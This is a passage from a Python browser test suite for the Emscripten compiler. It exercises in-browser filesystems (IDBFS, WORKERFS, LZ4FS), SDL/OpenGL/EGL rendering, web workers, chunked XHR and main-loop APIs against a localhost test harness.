self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_test,_success', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME', '-s', 'ASYNCIFY']
secret = str(time.time())
self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
self.btest(test_file('fs/test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=_main,_success', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-s', 'ASYNCIFY', '-s', 'EXIT_RUNTIME']
secret = str(time.time())
self.btest(test_file('fs/test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(test_file('fs/test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_file('file1.txt', 'first')
ensure_dir('sub')
open(Path('sub/file2.txt'), 'w').write('second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', Path('sub/file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(Path('fs/test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_file('file1.txt', '0123456789' * (1024 * 128))
open(Path('subdir/file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc; -s LZ4=1 tells emcc to pass the LZ4 option on to the file packager
print('emcc-normal')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(Path('subdir/file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([test_file('fs/test_lz4fs.cpp'), '--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-s', 'MODULARIZE=1'])
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(Path('fs/test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', Path('files/file1.txt'))
shutil.copyfile('file2.txt', Path('files/file2.txt'))
shutil.copyfile('file3.txt', Path('files/file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(Path('fs/test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(Path('browser/separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
print(stage)
self.btest_exit(test_file('idbstore.c'), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-s', 'ASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.btest(test_file('idbstore_sync_worker.c'), expected='0', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB', '-s', 'ASYNCIFY'])
def test_force_exit(self):
self.btest_exit('force_exit.c', assert_returncode=10)
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest_exit('sdl_canvas_size.c',
args=['-O2', '--minify=0', '--shell-file',
test_file('sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest_exit('glfw.c', args=['-s', 'LEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest_exit('glfw.c', args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest_exit('glfw_minimal.c', args=['-lglfw', '-lGL'])
self.btest_exit('glfw_minimal.c', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest_exit('test_glfw_time.c', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.btest_exit(test_file('test_egl.c'), args=['-O2', '-lEGL', '-lGL'] + list(args))
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.btest_exit(test_file('test_egl_width_height.c'), args=['-O2', '-lEGL', '-lGL'] + list(args))
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest_exit('test_egl_createcontext_error.c', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
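# A worker checksums a lazily-created file that a local helper server serves in small chunks; the page
# forwards the worker's stdout line (the checksum) to report_result, and it must match the adler32 of the
# generated data.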
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. test_file('hello_world_gles.c')
self.compile_btest([test_file(c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception:
print('(sleep for server)')
time.sleep(1)
if i == 59:
# range(60) ends at 59, so give up here if the server still has not come up
raise Exception('chunked XHR test server did not start in time')
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid a race condition on cleanup: wait a bit so that the processes have released their file locks
# before test tearDown() tries to rmdir() files that are still in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS'])
@requires_graphics_hardware
@parameterized({
'': ([False],),
# 'proxy' runs the same test with --proxy-to-worker
'proxy': ([True],)
})
def test_glgears_long(self, proxy):
args = ['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE']
if proxy:
args += ['--proxy-to-worker']
self.btest('hello_world_gles.c', expected='0', args=args)
@requires_graphics_hardware
def test_glgears_animation(self):
for filename in ['hello_world_gles.c', 'hello_world_gles_full.c', 'hello_world_gles_full_944.c']:
print(filename)
cmd = [test_file(filename), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING', '-lGL', '-lglut',
'--shell-file', test_file('hello_world_gles_shell.html')]
if 'full' in filename:
cmd += ['-s', 'FULL_ES2=1']
self.compile_btest(cmd)
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-s', 'GL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
assert 'gl-matrix' not in read_file('test.html'), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('glbook', [
Path('Chapter_2/Hello_Triangle', 'CH02_HelloTriangle.o'),
Path('Chapter_8/Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
Path('Chapter_9/Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
Path('Chapter_9/Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
Path('Chapter_9/TextureWrap', 'CH09_TextureWrap.o'),
Path('Chapter_10/MultiTexture', 'CH10_MultiTexture.o'),
Path('Chapter_13/ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return test_file('glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(test_file('glbook/Chapter_10/MultiTexture/basemap.tga'), 'basemap.tga')
shutil.copyfile(test_file('glbook/Chapter_10/MultiTexture/lightmap.tga'), 'lightmap.tga')
shutil.copyfile(test_file('glbook/Chapter_13/ParticleSystem/smoke.tga'), 'smoke.tga')
for source, reference in [
(Path('glbook/Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('glbook/CH02_HelloTriangle.png')),
# (Path('glbook/Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('glbook/CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(Path('glbook/Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('glbook/CH09_TextureWrap.png')),
# (Path('glbook/Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('glbook/CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(Path('glbook/Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('glbook/CH09_SimpleTexture2D.png')),
(Path('glbook/Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('glbook/CH10_MultiTexture.png')),
(Path('glbook/Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('glbook/CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + test_file('glbook/Common'),
test_file('glbook/Common/esUtil.c'),
test_file('glbook/Common/esShader.c'),
test_file('glbook/Common/esShapes.c'),
test_file('glbook/Common/esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest_exit('emscripten_api_browser.c', args=['-s', 'EXPORTED_FUNCTIONS=_main,_third', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_file('script1.js', '''
Module._set(456);
''')
create_file('file1.txt', 'first')
create_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest_exit('emscripten_api_browser2.c', args=['-s', 'EXPORTED_FUNCTIONS=_main,_set', '-s', 'FORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(Path('sub/test.data'), 'test.data')
self.btest_exit('emscripten_api_browser2.c', args=['-s', 'EXPORTED_FUNCTIONS=_main,_set', '-s', 'FORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest_exit('emscripten_api_browser_infloop.cpp', assert_returncode=7)
def test_emscripten_fs_api(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') # preloaded *after* run
self.btest_exit('emscripten_fs_api_browser.c', assert_returncode=1, args=['-lSDL'])
def test_emscripten_fs_api2(self):
self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-s', "ASSERTIONS=0"])
self.btest_exit('emscripten_fs_api_browser2.c', assert_returncode=1, args=['-s', "ASSERTIONS=1"])
@requires_threads
def test_emscripten_main_loop(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'EXIT_RUNTIME']]:
self.btest_exit('emscripten_main_loop.cpp', args=args)
@requires_threads
def test_emscripten_main_loop_settimeout(self):
for args in [
[],
# test pthreads + AUTO_JS_LIBRARIES mode as well
['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'AUTO_JS_LIBRARIES=0'],
]:
self.btest_exit('emscripten_main_loop_settimeout.cpp', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest_exit('emscripten_main_loop_and_blocker.cpp', args=args)
@requires_threads
def test_emscripten_main_loop_and_blocker_exit(self):
# Same as above but tests that EXIT_RUNTIME works with emscripten_main_loop. The
# app should still stay alive until the loop ends
self.btest_exit('emscripten_main_loop_and_blocker.cpp')
@requires_threads
def test_emscripten_main_loop_setimmediate(self):
for args in [[], ['--proxy-to-worker'], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest_exit('emscripten_main_loop_setimmediate.cpp', args=args)
def test_fs_after_main(self):
for args in [[], ['-O1']]:
self.btest('fs_after_main.cpp', '0', args=args)
def test_sdl_quit(self):
self.btest_exit('sdl_quit.c', args=['-lSDL', '-lGL'])
def test_sdl_resize(self):
# FIXME(https://github.com/emscripten-core/emscripten/issues/12978)
self.emcc_args.append('-Wno-deprecated-declarations')
self.btest('sdl_resize.c', '1', args=['-lSDL', '-lGL'])
def test_glshaderinfo(self):
self.btest('glshaderinfo.cpp', '1', args=['-lGL', '-lglut'])
@requires_graphics_hardware
def test_glgetattachedshaders(self):
self.btest('glgetattachedshaders.c', '1', args=['-lGL', '-lEGL'])
# Covered by the dEQP test suite (we can remove this test later if we add coverage for that).
@requires_graphics_hardware
def test_glframebufferattachmentinfo(self):
self.btest('glframebufferattachmentinfo.c', '1', args=['-lGLESv2', '-lEGL'])
@requires_graphics_hardware
def test_sdlglshader(self):
self.btest('sdlglshader.c', reference='sdlglshader.png', args=['-O2', '--closure=1', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_sdlglshader2(self):
self.btest_exit('sdlglshader2.c', args=['-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], also_proxied=True)
@requires_graphics_hardware
def test_gl_glteximage(self):
self.btest('gl_teximage.c', '1', args=['-lGL', '-lSDL'])
@requires_graphics_hardware
@requires_threads
def test_gl_textures(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
self.btest('gl_textures.cpp', '0', args=['-lGL'] + args)
@requires_graphics_hardware
def test_gl_ps(self):
# pointers and a shader
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_packed(self):
# packed data that needs to be strided
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_packed.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1)
@requires_graphics_hardware
def test_gl_ps_strides(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_strides.c', reference='gl_ps_strides.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'])
@requires_graphics_hardware
def test_gl_ps_worker(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('gl_ps_worker.c', reference='gl_ps.png', args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL', '--use-preload-plugins'], reference_slack=1, also_proxied=True)
@requires_graphics_hardware
def test_gl_renderers(self):
self.btest('gl_renderers.c', reference='gl_renderers.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_stride(self):
self.btest('gl_stride.c', reference='gl_stride.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer_pre(self):
self.btest('gl_vertex_buffer_pre.c', reference='gl_vertex_buffer_pre.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'])
@requires_graphics_hardware
def test_gl_vertex_buffer(self):
self.btest('gl_vertex_buffer.c', reference='gl_vertex_buffer.png', args=['-s', 'GL_UNSAFE_OPTS=0', '-s', 'LEGACY_GL_EMULATION', '-lGL', '-lSDL'], reference_slack=1)
@requires_graphics_hardware
def test_gles2_uniform_arrays(self):
self.btest('gles2_uniform_arrays.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'], also_proxied=True)
@requires_graphics_hardware
def test_gles2_conformance(self):
self.btest('gles2_conformance.cpp', args=['-s', 'GL_ASSERTIONS', '-lGL', '-lSDL'], expected=['1'])
@requires_graphics_hardware
def test_matrix_identity(self):
